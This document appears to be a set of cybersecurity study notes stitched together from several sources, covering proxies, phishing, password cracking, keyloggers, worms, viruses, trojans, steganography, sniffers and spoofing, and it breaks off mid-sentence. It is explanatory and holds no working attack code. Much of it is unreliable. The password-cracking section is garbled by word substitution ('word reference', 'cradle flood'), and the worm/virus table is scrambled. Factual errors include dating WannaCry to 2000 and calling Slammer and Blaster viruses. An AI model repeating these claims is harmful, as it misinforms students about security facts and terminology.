 Internet Client and Internet resources: For internet clients, Proxy
servers also act as a shield for an internal network against the request
coming from a client to access the data stored on the server. It makes the
original IP address of the node remains hidden while accessing data from
that server.
 Protects true host identity: In this method, outgoing traffic appears to
come from the proxy server rather than internet navigation. It must be
configured to the specific application such as HTTPs or FTP. For example,
organizations can use a proxy to observe the traffic of its employees to get
the work efficiently done. It can also be used to keep a check on any kind of
highly confidential data leakage. Some can also use it to increase their
websites rank.

Need Of Private Proxy:

1. Defeat Hackers: To protect organizations data from malicious use,

passwords are used and different architects are setup, but still, there may be
a possibility that this information can be hacked in case the IP address is
accessible easily. To prevent such kind of misuse of Data Proxy servers are
set up to prevent tracking of original IP addresses instead data is shown to
come from a different IP address.
2. Filtering of Content: By caching the content of the websites, Proxy
helps in fast access to the data that has been accessed very often.
3. Examine Packet headers and Payloads: Payloads and packet headers
of the requests made by the user nodes in the internal server to access to
social websites can be easily tracked and restricted.
4. To control internet usage of employees and children: In this, the
Proxy server is used to control and monitor how their employees or kids use
the internet. Organizations use it, to deny access to a specific website and
instead redirecting you with a nice note asking you to refrain from looking at
said sites on the company network.
5. Bandwidth savings and improved speeds: Proxy helps organizations
to get better overall network performance with a good proxy server.
6. Privacy Benefits: Proxy servers are used to browse the internet more
privately. It will change the IP address and identify the information the web
request contains.
7. Security: Proxy server is used to encrypt your web requests to keep
prying eyes from reading your transactions as it provides top-level security.
Types Of Proxy Server

1. Reverse Proxy Server: The job of a reverse proxy server to listen to the
request made by the client and redirect to the particular web server which is
present on different servers.
Example – Listen for TCP port 80 website connections which are normally
placed in a demilitarized zone (DMZ) zone for publicly accessible services
but it also protects the true identity of the host. Moreover, it is transparent to
external users as external users will not be able to identify the actual number
of internal servers. So, it is the prime duty of reverse proxy to redirect the
flow depending upon the configurations of internal servers. The request that
is made to pass through the private network protected by firewalls will need
a proxy server that is not abiding by any of the local policies. Such types of
requests from the clients are completed using reverse proxy servers. This is
also used to restrict the access of the clients to the confidential data residing
on the particular servers.
2. Web Proxy Server: Web Proxy forwards the HTTP requests, only URL is
passed instead of a path. The request is sent to particular the proxy server
responds. Examples, Apache, HAP Proxy.
3. Anonymous Proxy Server: This type of proxy server does not make an
original IP address instead these servers are detectable still provides
rational anonymity to the client device.
4. Highly Anonymity Proxy: This proxy server does not allow the original
IP address and it as a proxy server to be detected.
5. Transparent Proxy: This type of proxy server is unable to provide any
anonymity to the client, instead, the original IP address can be easily
detected using this proxy. But it is put into use to act as a cache for the
websites. A transparent proxy when combined with gateway results in a
proxy server where the connection requests are sent by the client , then IP
are redirected. Redirection will occurs without the client IP address
configuration. HTTP headers present on the server-side can easily detect its
redirection .
6. CGI Proxy: CGI proxy server developed to make the websites more
accessible. It accepts the requests to target URLs using a web form and
after processing its result will be returned to the web browser. It is less
popular due to some privacy policies like VPNs but it still receives a lot of
requests also. Its usage got reduced due to excessive traffic that can be
caused to the website after passing the local filtration and thus leads to
damage to the organization.
7. Suffix Proxy: Suffix proxy server basically appends the name of the
proxy to the URL. This type of proxy doesn’t preserve any higher level of
anonymity. It is used for bypassing the web filters. It is easy to use and can
 be easily implemented but is used less due to the more number of web filter
present in it.
8. Distorting Proxy: Proxy servers are preferred to generate an incorrect
original IP address of clients once being detected as a proxy server. To
maintain the confidentiality of the Client IP address HTTP headers are used.
9. Tor Onion Proxy: This server aims at online anonymity to the user’s
personal information. It is used to route the traffic through various networks
present worldwide to arise difficulty in tracking the users’ address and
prevent the attack of any anonymous activities. It makes it difficult for any
person who is trying to track the original address. In this type of routing, the
information is encrypted in a multi-folds layer. At the destination, each layer
is decrypted one by one to prevent the information to scramble and receive
original content. This software is open-source and free of cost to use.
10. 12P Anonymous Proxy: It uses encryption to hide all the
communications at various levels. This encrypted data is then relayed
through various network routers present at different locations and thus I2P is
a fully distributed proxy. This software is free of cost and open source to use,
It also resists the censorship.
11. DNS Proxy: DNS proxy take requests in the form of DNS queries and
forward them to the Domain server where it can also be cached, moreover
flow of request can also be redirected.

How Does The Proxy Server Operates?

Every computer has its unique IP address which it uses to communicate with
another node. Similarly, the proxy server has its IP address that your computer
knows. When a web request is sent, your request goes to the proxy server first.
The Proxy sends a request on your behalf to the internet and then collect the
data and make it available to you. A proxy can change your IP address So, the
webserver will be unable to fetch your location in the world. It protects data from
getting hacked too. Moreover, it can block some web pages

also.

Disadvantages of Proxy Server

1. Proxy Server Risks: Free installation does not invest much in backend
hardware or encryption. It will result in performance issues and potential
data security issues. If you install a “free” proxy server, treat very carefully,
some of those might steal your credit card numbers.
2. Browsing history log: The proxy server stores your original IP address
and web request information is possibly unencrypted form and saved locally.
Always check if your proxy server logs and saves that data – and what kind
of retention or law enforcement cooperation policies they follow while saving
data.
3. No encryption: No encryption means you are sending your requests as
plain text. Anyone will be able to pull usernames and passwords and
account information easily. Keep a check that proxy provides full encryption
whenever you use it.

Phishing
Phishing is one type of cyber attack. Phishing got its name from “phish”
meaning fish. It’s a common phenomenon to put bait for the fish to get trapped.
Similarly, phishing works. It is an unethical way to dupe the user or victim to
click on harmful sites. The attacker crafts the harmful site in such a way that the
victim feels it to be an authentic site, thus falling prey to it. The most common
mode of phishing is by sending spam emails that appear to be authentic and
thus, taking away all credentials from the victim. The main motive of the
attacker behind phishing is to gain confidential information like
 Password
 Credit card details
 Social security numbers
 Date of birth
The attacker uses this information to further target the user and impersonate
the user and cause data theft. The most common type of phishing attack
happens through email. Phishing victims are tricked into revealing information
that they think should be kept private. The original logo of the email is used to
make the user believe that it is indeed the original email. But if we carefully look
into the details, we will find that the URL or web address is not authentic. Let’s
understand this concept
In this example, most people believe it’s YouTube just by looking at the red
icon. So, thinking of YouTube as a secure platform, the users click on the
extension without being suspicious about it. But if we look carefully, we can see
the URL is supertube.com and not youtube.com. Secondly, YouTube never
asks to add extensions for watching any video. The third thing is the extension
name itself is weird enough to raise doubt about its credibility.
How Does Phishing Occur?
Below mentioned are the ways through which Phishing generally occurs. Upon
using any of the techniques mentioned below, the user can lead to Phishing
Attacks.
 Clicking on an unknown file or attachment: Here, the attacker
deliberately sends a mysterious file to the victim, as the victim opens the file,
either malware is injected into his system or it prompts the user to enter
confidential data.
 Using an open or free wifi hotspot: This is a very simple way to get
confidential information from the user by luring him by giving him free wifi.
The wifi owner can control the user’s data without the user knowing it.
 Responding to social media requests: This commonly includes social
engineering. Accepting unknown friend requests and then, by mistake,
leaking secret data are the most common mistake made by naive users.
 Clicking on unauthenticated links or ads: Unauthenticated links have
been deliberately crafted that lead to a phished website that tricks the user
into typing confidential data.
Types of Phishing Attacks
There are several types of Phishing Attacks, some of them are mentioned
below. Below mentioned attacks are very common and mostly used by the
attackers.
 Email Phishing: The most common type where users are tricked into
clicking unverified spam emails and leaking secret data. Hackers
impersonate a legitimate identity and send emails to mass victims.
Generally, the goal of the attacker is to get personal details like bank details,
credit card numbers, user IDs, and passwords of any online shopping
website, installing malware, etc. After getting the personal information, they
use this information to steal money from the user’s account or harm the
target system, etc.
 Spear Phishing: In spear phishing of phishing attack, a particular
user(organization or individual) is targeted. In this method, the attacker first
gets the full information of the target and then sends malicious emails to
his/her inbox to trap him into typing confidential data. For example, the
attacker targets someone(let’s assume an employee from the finance
department of some organization). Then the attacker pretends to be like the
manager of that employee and then requests personal information or
transfers a large sum of money. It is the most successful attack.
 Whaling: Whaling is just like spear-phishing but the main target is the
head of the company, like the CEO, CFO, etc. a pressurized email is sent to
such executives so that they don’t have much time to think, therefore falling
prey to phishing.
 Smishing: In this type of phishing attack, the medium of phishing attack
is SMS. Smishing works similarly to email phishing. SMS texts are sent to
victims containing links to phished websites or invite the victims to call a
phone number or to contact the sender using the given email. The victim is
then invited to enter their personal information like bank details, credit card
information, user id/ password, etc. Then using this information the attacker
harms the victim.
 Vishing: Vishing is also known as voice phishing. In this method, the
attacker calls the victim using modern caller id spoofing to convince the
victim that the call is from a trusted source. Attackers also use IVR to make it
difficult for legal authorities to trace the attacker. It is generally used to steal
credit card numbers or confidential data from the victim.
 Clone Phishing: Clone Phishing this type of phishing attack, the attacker
copies the email messages that were sent from a trusted source and then
alters the information by adding a link that redirects the victim to a malicious
or fake website. Now the attacker sends this mail to a larger number of users
and then waits to watch who clicks on the attachment that was sent in the
email. It spreads through the contacts of the user who has clicked on the
attachment.
Impact of Phishing
These are the impacts on the user upon affecting the Phishing Attacks. Each
person has their own impact after getting into Phishing Attacks, but these are
some of the common impacts that happen to the majority of people.
 Financial Loss: Phishing attacks often target financial information, such
as credit card numbers and bank account login credentials. This information
can be used to steal money or make unauthorized purchases, leading to
significant financial losses.
 Identity Theft: Phishing attacks can also steal personal information, such
as Social Security numbers and date of birth, which can be used to steal an
individual’s identity and cause long-term harm.
 Damage to Reputation: Organizations that fall victim to phishing attacks
can suffer damage to their reputation, as customers and clients may lose
trust in the company’s ability to protect their information.
 Disruption to Business Operations: Phishing attacks can also cause
significant disruption to business operations, as employees may have their
email accounts or computers compromised, leading to lost productivity and
data.
 Spread of Malware: Phishing attacks often use attachments or links to
deliver malware, which can infect a victim’s computer or network and cause
further harm.
Signs of Phishing
It is very much important to be able to identify the signs of a phishing attack in
order to protect against its harmful effects. These signs help the user to protect
user data and information from hackers. Here are some signs to look out for
include:
 Suspicious email addresses: Phishing emails often use fake email
addresses that appear to be from a trusted source, but are actually
controlled by the attacker. Check the email address carefully and look for
slight variations or misspellings that may indicate a fake address.
 Urgent requests for personal information: Phishing attacks often try to
create a sense of urgency in order to trick victims into providing personal
information quickly. Be cautious of emails or messages that ask for personal
information and make sure to verify the authenticity of the request before
providing any information.
 Poor grammar and spelling: Phishing attacks are often created quickly
and carelessly, and may contain poor grammar and spelling errors. These
mistakes can indicate that the email or message is not legitimate.
 Requests for sensitive information: Phishing attacks often try to steal
sensitive information, such as login credentials and financial information. Be
cautious of emails or messages that ask for sensitive information and verify
the authenticity of the re
 quest before providing any information.
 Unusual links or attachments: Phishing attacks often use links or
attachments to deliver malware or redirect victims to fake websites. Be
cautious of links or attachments in emails or messages, especially from
unknown or untrusted sources.
 Strange URLs: Phishing attacks often use fake websites that look similar
to the real ones, but have slightly different URLs. Look for strange URLs or
slight variations in the URL that may indicate a fake website.
How To Stay Protected Against Phishing?
Until now, we have seen how a user becomes so vulnerable due to phishing.
But with proper precautions, one can avoid such scams. Below are the ways
listed to protect users against phishing attacks:
 Authorized Source: Download software from authorized sources only
where you have trust.
 Confidentiality: Never share your private details with unknown links and
keep your data safe from hackers.
 Check URL: Always check the URL of websites to prevent any such
attack. it will help you not get trapped in Phishing Attacks.
 Avoid replying to suspicious things: If you receive an email from a
known source but that email looks suspicious, then contact the source with a
new email rather than using the reply option.
 Phishing Detection Tool: Use phishing-detecting tools to monitor the
websites that are crafted and contain unauthentic content.
 Try to avoid free wifi: Avoid using free Wifi, it will lead to threats and
Phishing.
 Keep your system updated: It’s better to keep your system always
updated to protect from different types of Phishing Attacks.
 Keep the firewall of the system ON: Keeping ON the firewalls helps you
in filtering ambiguous and suspicious data and only authenticated data will
reach to you.
How To Distinguish between a Fake Website and a Real Website?
It is very important nowadays to protect yourself from fake websites and real
websites. Here are some of the ways mentioned through which you can identify
which websites are real and which ones are fake. To distinguish between a fake
website and a real website always remember the following points:
 Check the URL of the website: A good and legal website always uses a
secure medium to protect yourself from online threats. So, when you first see
a website link, always check the beginning of the website. That means if a
website is started with https:// then the website is secure because https:// s
denotes secure, which means the website uses encryption to transfer data,
protecting it from hackers. If a website uses http:// then the website is not
guaranteed to be safe. So, it is advised not to visit HTTP websites as they
are not secure.
 Check the domain name of the website: The attackers generally create
a website whose address mimic of large brands or companies like
www.amazon.com/order_id=23. If we look closely, we can see that it’s a fake
website as the spelling of Amazon is wrong, that is amazon is written. So it’s
a phished website. So be careful with such types of websites.
 Look for site design: If you open a website from the link, then pay
attention to the design of the site. Although the attacker tries to imitate the
original one as much as possible, they still lack in some places. So, if you
see something off, then that might be a sign of a fake website. For example,
www.sugarcube.com/facebook, when we open this URL the page open is
cloned to the actual Facebook page but it is a fake website. The original link
to Facebook is www.facebook.com.
 Check for the available web pages: A fake website does not contain the
entire web pages that are present in the original website. So when you
encounter fake websites, then open the option(links) present on that website.
If they only display a login page, then the website is fake.
Anti-Phishing Tools
Well, it’s essential to use Anti-Phishing tools to detect phishing attacks. Here
are some of the most popular and effective anti-phishing tools available:
 Anti-Phishing Domain Advisor (APDA): A browser extension that
warns users when they visit a phishing website. It uses a database of known
phishing sites and provides real-time protection against new threats.
 PhishTank: A community-driven website that collects and verifies reports
of phishing attacks. Users can submit phishing reports and check the status
of suspicious websites.
 Webroot Anti-Phishing: A browser extension that uses machine
learning algorithms to identify and block phishing websites. It provides real-
time protection and integrates with other security tools.
 Malwarebytes Anti-Phishing: A security tool that protects against
phishing attacks by detecting and blocking suspicious websites. It uses a
combination of machine learning and signature-based detection to provide
real-time protection.
 Kaspersky Anti-Phishing: A browser extension that provides real-time
protection against phishing attacks. It uses a database of known phishing
sites and integrates with other security tools to provide comprehensive
protection.

Password cracking is one of the imperative phases of the hacking

framework. Password cracking is a way to recuperate passwords from the
information stored or sent by a PC or mainframe. The motivation behind
password cracking is to assist a client with recuperating a failed authentication
or recovering a password, as a preventive measure by framework chairmen to
check for effectively weak passwords, or an assailant can utilize this cycle to
acquire unapproved framework access.
Types of Password Attacks :
Password cracking is consistently violated regardless of the legal aspects to
secure from unapproved framework access, for instance, recovering a
password the customer had forgotten etc. This hack arrangement depends
upon aggressors exercises, which are ordinarily one of the four types:
1. Non-Electronic Attacks –
This is most likely the hacker’s first go-to to acquire the target system
password. These sorts of password cracking hacks don’t need any
specialized ability or information about hacking or misuse of frameworks.
Along these lines, this is a non-electronic hack. A few strategies used for
actualizing these sorts of hacks are social engineering, dumpster diving,
shoulder surfing, and so forth.
2. Active Online Attacks –
This is perhaps the most straightforward approach to acquire unapproved
manager-level mainframe access. To crack the passwords, a hacker needs
to have correspondence with the objective machines as it is obligatory for
password access. A few techniques used for actualizing these sorts of hacks
 are word reference, brute-forcing, password speculating, hash infusion,
phishing, LLMNR/NBT-NS Poisoning, utilizing Trojan/spyware/keyloggers,
and so forth.
3. Passive Online Attacks –
An uninvolved hack is a deliberate attack that doesn’t bring about a change
to the framework in any capacity. In these sorts of hacks, the hacker doesn’t
have to deal with the framework. In light of everything, he/she idly screens or
records the data ignoring the correspondence channel to and from the
mainframe. The attacker then uses the critical data to break into the system.
Techniques used to perform passive online hacks incorporate replay attacks,
wire-sniffing, man-in-the-middle attack, and so on.
4. Offline Attacks –
Disconnected hacks allude to password attacks where an aggressor
attempts to recuperate clear content passwords from a password hash
dump. These sorts of hacks are habitually dreary yet can be viable, as
password hashes can be changed due to their more modest keyspace and
more restricted length. Aggressors utilize preprocessed hashes from rainbow
tables to perform disconnected and conveyed network hacks.
Some of the best practices protecting against password cracking include :
1. Perform data security reviews to screen and track password assaults.
2. Try not to utilize a similar password during the password change.
3. Try not to share passwords.
4. Do whatever it takes not to use passwords that can be found in a word
reference.
5. Make an effort not to use clear content shows and shows with weak
encryption.
6. Set the password change technique to 30 days.
7. Try not to store passwords in an unstable area.
8. Try not to utilize any mainframe’s or PC’s default passwords.
9. Unpatched computers can reset passwords during cradle flood or Denial
of Service assaults. Try to refresh the framework.
10. Empower account lockout with a specific number of endeavors, counter
time, and lockout span. One of the best approaches to oversee passwords in
associations is to set a computerized password reset.
11. Ensure that the computer or server’s BIOS is scrambled with a password,
particularly on devices that are unprotected from real perils, for instance,
centralized servers and PCs.

Key loggers

also known as keystroke loggers, may be defined as the recording of the key
pressed on a system and saved it to a file, and the that file is accessed by the
person using this malware. Key logger can be software or can be
hardware. Working: Mainly key-loggers are used to steal password or
confidential details such as bank information etc. First key-logger was invented
in 1970’s and was a hardware key logger and first software key-logger was
developed in 1983. 1. Software key-loggers : Software key-loggers are the
computer programs which are developed to steal password from the victims
computer. However key loggers are used in IT organizations to troubleshoot
technical problems with computers and business networks. Also Microsoft
windows 10 also has key-logger installed in it.
1. JavaScript based key logger – It is a malicious script which is installed
into a web page, and listens for key to press such as oneKeyUp(). These
scripts can be sent by various methods, like sharing through social media,
sending as a mail file, or RAT file.
2. Form Based Key loggers – These are key-loggers which activates when
a person fills a form online and when click the button submit all the data or
the words written is sent via file on a computer. Some key-loggers works as
a API in running application it looks like a simple application and whenever a
key is pressed it records it.
2. Hardware Key-loggers : These are not dependent on any software as these
are hardware key-loggers. keyboard hardware is a circuit which is attached in a
keyboard itself that whenever the key of that keyboard pressed it gets recorded.
1. USB keylogger – There are USB connector key-loggers which has to be
connected to a computer and steals the data. Also some circuits are built
into a keyboard so no external wire i used or shows on the keyboard.
2. Smartphone sensors – Some cool android tricks are also used as key
loggers such as android accelerometer sensor which when placed near to
the keyboard can sense the vibrations and the graph then used to convert it
to sentences, this technique accuracy is about 80%. Now a days crackers
are using keystroke logging Trojan, it is a malware which is sent to a victims
computer to steal the data and login details.
So key-loggers are the software malware or a hardware which is used to steal ,
or snatch our login details, credentials , bank information and many more.
Some keylogger application used in 2020 are:
1. Kidlogger
2. Best Free Keylogger
3. Windows Keylogger
4. Refog Personal Monitor
5. All In One Keylogger
Prevention from key-loggers : These are following below-
1. Anti-Key-logger – As the name suggest these are the software which
are anti / against key loggers and main task is to detect key-logger from a
computer system.
2. Anti-Virus – Many anti-virus software also detect key loggers and delete
them from the computer system. These are software anti-software so these
can not get rid from the hardware key-loggers.
3. Automatic form filler – This technique can be used by the user to not fill
forms on regular bases instead use automatic form filler which will give a
shield against key-loggers as keys will not be pressed .
4. One-Time-Passwords – Using OTP’s as password may be safe as every
time we login we have to use a new password.
5. Patterns or mouse-recognition – On android devices used pattern as a
password of applications and on PC use mouse recognition, mouse program
uses mouse gestures instead of stylus.
6. Voice to Text Converter – This software helps to prevent Keylogging
which targets a specific part of our keyboard.

1. Worms :
Worms are similar to a virus but it does not modify the program. It replicates
itself more and more to cause slow down the computer system. Worms can be
controlled by remote. The main objective of worms is to eat the system
resources. The WannaCry ransomware worm in 2000 exploits the Windows
Server Message Block (SMBv1) which is a resource-sharing protocol.
2. Virus :
A virus is a malicious executable code attached to another executable file that
can be harmless or can modify or delete data. When the computer program
runs attached with a virus it performs some action such as deleting a file from
the computer system. Viruses can’t be controlled by remote. The ILOVEYOU
virus spreads through email attachments.
Difference between Worms and Virus :

Basis of
Sr.No. Comparison WORMS VIRUS

A Virus is a malicious
A Worm is a form of malware executable code attached to
that replicates itself and can another executable file
spread to different computers via which can be harmless or
1. Definition Network. can modify or delete data.

The main objective of worms is

to eat the system resources. It The main objective of
consumes system resources such viruses is to modify the
2. Objective as memory and bandwidth and information.
 made the system slow in speed to
such an extent that it stops
responding.

It doesn’t need a host to replicate It requires a host is needed

3. Host from one computer to another. for spreading.

4. Harmful It is less harmful as compared. It is more harmful.

Detection Worms can be detected and Antivirus software is used

and removed by the Antivirus and for protection against
5. Protection firewall. viruses.

Controlled Worms can be controlled by Viruses can’t be controlled

6. by remote. by remote.

Worms are executed via Viruses are executed via

7. Execution weaknesses in the system. executable files.

Worms generally comes from the Viruses generally comes

downloaded files or through a from the shared or
8. Comes from network connection. downloaded files.

 Hampering computer  Pop-up windows

performance by slowing down linking to malicious
it websites
 Automatic opening and  Hampering
running of programs computer performance
 Sending of emails without by slowing down it
your knowledge  After booting,
 Affected the performance starting of unknown
of web browser programs.
 Error messages  Passwords get
concerning to system and changed without your
9. Symptoms operating system knowledge

 Keep your operating  Installation of

system and system in updated Antivirus software
state  Never open email
 Avoid clicking on links attachments
from untrusted or unknown  Avoid usage of
websites pirated software
 Avoid opening emails from  Keep your operating
10. Prevention unknown sources system updated
  Use antivirus software and  Keep your browser
a firewall updated as old versions
are vulnerable to linking
to malicious websites

Boot sector virus, Direct

Internet worms, Instant Action virus, Polymorphic
messaging worms, Email worms, virus, Macro virus,
File sharing worms, Internet Overwrite virus, File
relay chat (IRC) worms are Infector virus are different
11. Types different types of worms. types of viruses

Examples of viruses include

Examples of worms include Creeper, Blaster, Slammer,
12. Examples Morris worm, storm worm, etc. etc.

It does not need human action to It needs human action to

13. Interface replicate. replicate.

Its spreading speed is

slower as compared to
14. Speed Its spreading speed is faster. worms.

Trojan Horse:
 A standalone malicious program that may give full control of an infected
PC to another PC is called a Trojan horse.
 This is actually a code segment that tries to misuse its own environment.
 They somehow look attractive but on the other hand, they are really
harmful and they actually serve as virus carriers.
 It may make copies of them, harm the host computer systems, or steal
information.
 The Trojan horse will actually do damage once installed or run on your
computer but at first, a glance will appear to be useful software.
 Trojans are designed as they can cause serious damage by deleting files
and destroying information on your system.
 Trojans allow confidential or personal information to be compromised by
the system creating a backdoor on your computer that gives unauthorized
users access to your system.
 Unlike Trojans do not self-replicate or reproduce by infecting other files
nor do they self-replicate which means Trojan horse viruses differ from other
computer viruses and do not spread themselves.
 The most popular Trojan horses are Beast, Zeus, The Blackhole Exploit
Kit, Flashback Trojan, Netbus, Subseven, Y3K Remote Administration Tool,
and Back Orifice.
2.Trap Door:
 A trap door is kind of a secret entry point into a program that allows
anyone to gain access to any system without going through the usual
security access procedures.
 Another definition of a trap door is it is a method of bypassing normal
authentication methods. Therefore it is also known as a back door.
 Trap Doors are quite difficult to detect and also in order to find them the
programmers or the developers have to go through the components of the
system.
 Programmers use Trap door legally to debug and test programs. Trap
doors turn to threats when any dishonest programmers gain illegal access.
 Program development and software update activities should be the first
focus of security measures. The operating system that controls the trap
doors is difficult to implement.

The word Steganography is derived from two Greek words- ‘stegos’ meaning
‘to cover’ and ‘grayfia’, meaning ‘writing’, thus translating to ‘covered writing’, or
‘hidden writing’. Steganography is a method of hiding secret data, by
embedding it into an audio, video, image, or text file. It is one of the methods
employed to protect secret or sensitive data from malicious attacks.
How is it different from cryptography?
Cryptography and steganography are both methods used to hide or protect
secret data. However, they differ in the respect that cryptography makes the
data unreadable, or hides the meaning of the data, while steganography hides
the existence of the data.
In layman’s terms, cryptography is similar to writing a letter in a secret
language: people can read it, but won’t understand what it means. However, the
existence of a (probably secret) message would be obvious to anyone who
sees the letter, and if someone either knows or figures out your secret
language, then your message can easily be read.
If you were to use steganography in the same situation, you would hide the
letter inside a pair of socks that you would be gifting the intended recipient of
the letter. To those who don’t know about the message, it would look like there
was nothing more to your gift than the socks. But the intended recipient knows
what to look for, and finds the message hidden in them.
Similarly, if two users exchanged media files over the internet, it would be more
difficult to determine whether these files contain hidden messages than if they
were communicating using cryptography.
Cryptography is often used to supplement the security offered by
steganography. Cryptography algorithms are used to encrypt secret data before
embedding it into cover files.
Image Steganography –
As the name suggests, Image Steganography refers to the process of hiding
data within an image file. The image selected for this purpose is called
the cover image and the image obtained after steganography is called
the stego image.
How is it done?
An image is represented as an N*M (in case of grayscale images) or N*M*3 (in
case of color images) matrix in memory, with each entry representing the
intensity value of a pixel. In image steganography, a message is embedded into
an image by altering the values of some pixels, which are chosen by an
encryption algorithm. The recipient of the image must be aware of the same
algorithm in order to know which pixels he or she must select to extract the
message.

Figure – Process of Image Steganography

Is steganography a secure method of communication?
When steganography is employed alone, it is security by obscurity, which might
result in the secret message being disclosed. Combining steganography and
cryptography is the greatest way to disguise a message from adversaries while
still protecting it in case it is detected.
In steganography, what algorithm is used?
His steganography approach entails concealing a huge amount of data (picture,
audio, and text) within a colour bitmap (bmp) image. The image will be filtered
and segmented in his study, with bits replacement applied to the appropriate
pixels. These pixels are chosen at random rather than in order.
Detection of the message within the cover image is done by the process
of steganalysis. This can be done through comparison with the cover image,
histogram plotting, or noise detection. While efforts are being invested in
developing new algorithms with a greater degree of immunity against such
attacks, efforts are also being devoted towards improving existing algorithms for
steganalysis, to detect the exchange of secret information between terrorists or
criminal elements.
Here’s an example of how image steganography can be implemented using Python and
the ‘PIL' (Python Imaging Library) library:
1. Install the required libraries:
Open a command-line interface (CLI) or terminal.
Run the following command to install the ‘PIL' library:
pip install pillow

In this example, we first convert the secret text into binary form. We then modify
the least significant bit of each color channel (red, green, and blue) of the image
pixels to store the binary representation of the secret text. To extract the secret
text, we retrieve the least significant bit of each color channel and convert it
back to ASCII characters.
Some of the features of image steganography in cryptography are:
Secrecy: The primary feature of image steganography is secrecy. The secret
information is hidden within the image in a way that is not easily detectable by
an unauthorized person.
Capacity: The capacity of an image to carry secret information depends on the
size of the image and the amount of information to be hidden. Generally, larger
images have a higher capacity to carry secret information.
Robustness: The image steganography technique should be robust, i.e., it
should be able to withstand image processing techniques like compression,
cropping, and resizing without affecting the hidden information.
Security: The security of the hidden information is of utmost importance. The
image steganography technique should be designed in such a way that it is
resistant to attacks like statistical analysis and brute force attacks.
Efficiency: The image steganography technique should be efficient, i.e., it
should be able to hide the secret information in the image quickly and
effectively.
Concealment: The hidden information should be concealed in the image in a
way that it is not easily distinguishable from the original image.
Retrieval: The hidden information should be retrievable by the authorized party
using a decryption key or algorithm.
Advantages of Image Steganography:
Security: Image steganography provides a high level of security for secret
communication as it hides the secret message within the image, making it
difficult for an unauthorized person to detect it.
Capacity: Image steganography has a high capacity to carry secret information
as it can hide a large amount of data within an image.
Covert Communication: Image steganography provides a covert means of
communication, as the existence of the secret message is hidden within the
image.
Robustness: Steganography techniques are often designed to be robust,
meaning that the hidden message can remain intact even when the image
undergoes common image processing operations like compression or resizing.
Resistance to Cryptanalysis: Steganography can make it difficult for
cryptanalysts to detect and analyze hidden messages as the message is
camouflaged within the image, making it difficult to separate from the image’s
natural features.
Disadvantages of Image Steganography:
Detection: Steganography can be detected if a person has the right tools and
techniques, so it is not a foolproof method of securing communication.
Complexity: Steganography can be complex and requires specialized tools
and knowledge to implement effectively.
Lengthy Transmission Time: Hiding data within an image can be a time-
consuming process, especially for large files, which can slow down the
transmission of data.
Susceptibility to Data Loss: The hidden message may be lost or distorted
during the transmission or processing of the image, resulting in a loss of data.
Misuse: Steganography can be misused for illegal activities, including hiding
malicious code or malware within an image, making it difficult to detect and
prevent cybersecurity attacks.

A sniffer, also known as a packet analyzer or network analyzer, is a tool used to

capture and analyze network traffic. It is a software or hardware tool that
intercepts and records data packets transmitted between computers or devices
on a network.
Packet sniffers are commonly used for network troubleshooting, security
analysis, and network optimization. They can be used to identify network
problems such as congestion, packet loss, or improper configurations, and they
can also be used to detect security threats such as network intrusions or
unauthorized access attempts.
Packet sniffers work by capturing packets of data as they are transmitted on the
network. These packets are then analyzed and displayed to the user in a
human-readable format, allowing them to examine the contents of the packets
and extract information from them.
Packet sniffers can be used on both wired and wireless networks, and they can
capture data from a variety of network protocols, including TCP/IP, HTTP, FTP,
and SMTP.
However, it is important to note that packet sniffers can also be used for
malicious purposes, such as intercepting sensitive information such as
passwords, credit card numbers, or personal information. Therefore, the use of
packet sniffers should be regulated and used only for legitimate purposes with
appropriate consent and legal authority.
A Sniffer is a program or tool that captures information over a network. There
are 2 types of Sniffers: Commercial Sniffers and Underground Sniffers.

1. Commercial Sniffers –
Commercial sniffers are used to maintain and monitor information over the
network. These sniffers are used to detect network problems. Network
General Corporation (NGC) is a company that offers commercial sniffers.
These can be used for:
1. Fault analysis to detect problems in a network.

2. Performance analysis to detect network bottlenecks.

2. Underground Sniffers –
Underground sniffers are malicious programs used by hackers to capture
information over a network when underground sniffers are installed on the
router, it can breach security of any network that passes through the router.
It can capture:
1. Confidential messages like email.

2. Financial data like debit card details.

Components of a Sniffer:
To capture the information over the network sniffer uses the following
components:

1. Hardware –
Sniffers use standard network adapters to capture network traffic.

2. Capture Driver –
Capture Driver captures network traffic from Ethernet wire, filters that
network traffic for information that you want, and then stores the filtered
 information in a buffer.

3. Buffer –
When a sniffer captures data from a network, it stores data in a buffer. There
are 2 ways to store captured data –
1. You can store data until the buffer is filled with information

2. It is the round-robin method in which data in the buffer is always

replaced by new data that is captured.

4. Decoder –
The information that travels over the network is in binary format, which is not
readable. you can use a decoder to interpret this information and display it in
a readable format. A decoder helps you analyze how information is passed
from one computer to other.

Placement of Sniffer:
The most common places where you can place sniffers are:
1. Computer
2. Cable wires
3. Routers
4. Network segments connected to the internet

Spoofing is a completely new beast created by merging age-old deception

strategies with modern technology. Spoofing is a sort of fraud in which
someone or something forges the sender’s identity and poses as a reputable
source, business, colleague, or other trusted contact in order to obtain personal
information, acquire money, spread malware, or steal data.
Types of Spoofing:
 IP Spoofing
 ARP Spoofing
 Email Spoofing
 Website Spoofing Attack
 DNS Spoofing
IP Spoofing:
IP is a network protocol that allows you to send and receive messages over the
internet. The sender’s IP address is included in the message header of every
email message sent (source address). By altering the source address, hackers
and scammers alter the header details to hide their original identity. The emails
then look to have come from a reliable source. IP spoofing can be divided into
two categories.
 Man in the Middle Attacks: Communication between the original sender
of the message and the intended recipient is intercepted, as the term
implies. The message’s content is then changed without the knowledge of
either party. The attacker inserts his own message into the packet.
 Denial of Service (DoS) Attacks: In this technique, the sender and
recipient’s message packets are intercepted, and the source address is
spoofed. The connection has been seized. The recipient is thus flooded with
packets in excess of their bandwidth or resources. This overloads the
victim’s system, effectively shutting it down.
Drawback:
In a Man-in-the-middle attack, even the receiver doesn’t know where the
connection got originated. This is completely a blind attack. To successfully
carry out his attack, he will require a great deal of experience and
understanding of what to expect from the target’s responses.
Preventive measures:
Disabling source-routed packets and all external incoming packets with the
same source address as a local host are two of the most frequent strategies to
avoid this type of attack.
ARP Spoofing:
ARP spoofing is a hacking method that causes network traffic to be redirected
to a hacker. Sniffing out LAN addresses on both wired and wireless LAN
networks is known as spoofing. The idea behind this sort of spoofing is to
transmit false ARP communications to Ethernet LANs, which can cause traffic
to be modified or blocked entirely.
The basic work of ARP is to match the IP address to the MAC address.
Attackers will transmit spoofed messages across the local network. Here the
response will map the user’s MAC address with his IP address. Thus attacker
will gain all information from the victim machine.
Preventive measures:
To avoid ARP poisoning, you can employ a variety of ways, each with its own
set of benefits and drawbacks. Static ARP entries, encryption, VPNs, and
